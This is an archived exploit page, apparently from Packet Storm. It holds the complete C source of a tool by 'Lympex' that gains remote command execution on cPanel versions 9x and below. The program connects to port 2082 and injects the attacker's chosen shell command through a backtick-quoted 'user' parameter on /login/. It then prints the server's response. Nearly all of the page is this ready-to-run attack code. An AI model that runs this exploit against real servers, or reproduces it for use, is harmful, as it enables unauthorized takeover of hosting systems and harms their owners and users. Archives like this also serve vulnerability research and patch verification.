Exploit for cPanel versions below and equal to 9x that takes advantage of a remote command execution vulnerability.
6e74cd53627a40348b129b2f8f7c66f2eb17564e01d5469e32a0bb3e9bcee9c5/*
cPanel <= 9x Remote Command Execution
Coded by Lympex - lympex[at]gmail[dot]com && http://l-bytes.net
*/
//headers
#include <stdio.h>//In/Out
#include <winsock2.h>//sockets functions
#include <stdlib.h>//memory functions
#include <string.h>//strlen,strcat,strcpy
#pragma comment(lib,"ws2_32.lib") //for compile with dev-c++ link to "libws2_32.lib"
#define Port 2082 //port for connect to cPanel
#define SIZE 1024 //buffer size to receive the data
/*connect host:port*/
SOCKET Conecta(char *Host, short puerto)
{
/*struct for make the socket*/
WSADATA wsaData;
SOCKET Winsock;//listener socket
/*two structures for connect*/
struct sockaddr_in Winsock_In;
struct hostent *Ip;
/*start the socket*/
WSAStartup(MAKEWORD(2,2), &wsaData);
/*make*/
Winsock=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,(unsigned int)NULL,(unsigned int)NULL);
//check socket status
if(Winsock==INVALID_SOCKET)
{
/*exit*/
WSACleanup();
return -1;
}
/*complete the struct*/
Ip=gethostbyname(Host);
Winsock_In.sin_port=htons(puerto);
Winsock_In.sin_family=AF_INET;
Winsock_In.sin_addr.s_addr=inet_addr(inet_ntoa(*((struct in_addr *)Ip->h_addr)));
/*connect*/
if(WSAConnect(Winsock,(SOCKADDR*)&Winsock_In,sizeof(Winsock_In),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
{
/*end*/
WSACleanup();
return -1;
}
return Winsock;
}
/*MASTER FUNCTION*/
int main(int argc, char *argv[])
{
/*the socket*/
SOCKET sock;
/*make the evil buffer to send the request*/
char evil_request[]="GET /login/?user=|%22%60";
char evil_request2[]="%60%22\r";
char *evil;
/*to receive the data*/
char buf[SIZE];
printf("\n+[ cPanel <= 9x Remote Command Execution ]+ by Lympex");
printf("\nContact: lympex[at]gmail[dot]com & http://l-bytes.net");
printf("\n-----------------------------------------------------\n");
if(argc!=3)//cPanel_9x_rce.exe <host> <command>
{
printf("\n[+] Usage: %s <host> <command>\n",argv[0]);
return 0;
}
printf("\n[+] Connecting %s:%d...",argv[1],Port);
/*start the exploit*/
sock=Conecta(argv[1],Port);//connect
if(sock==-1)
{
printf("Error\n");
return 1;
}
printf("OK");
/*make the EVIL request*/
evil=(char *) malloc((strlen(argv[2])+24+12)*sizeof(char));
strcpy(evil,evil_request);strcat(evil,argv[2]);strcat(evil,evil_request2);strcat(evil,"\n\n");
//sends it
send(sock,evil,strlen(evil),0);
buf[recv(sock,buf,SIZE,0)]='\0';
//show the data
printf("\n\n------- [Result] -------\n\n%s\n------- [/Result] -------\n",buf);
WSACleanup();
LocalFree(buf);
LocalFree(evil);
return 0;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed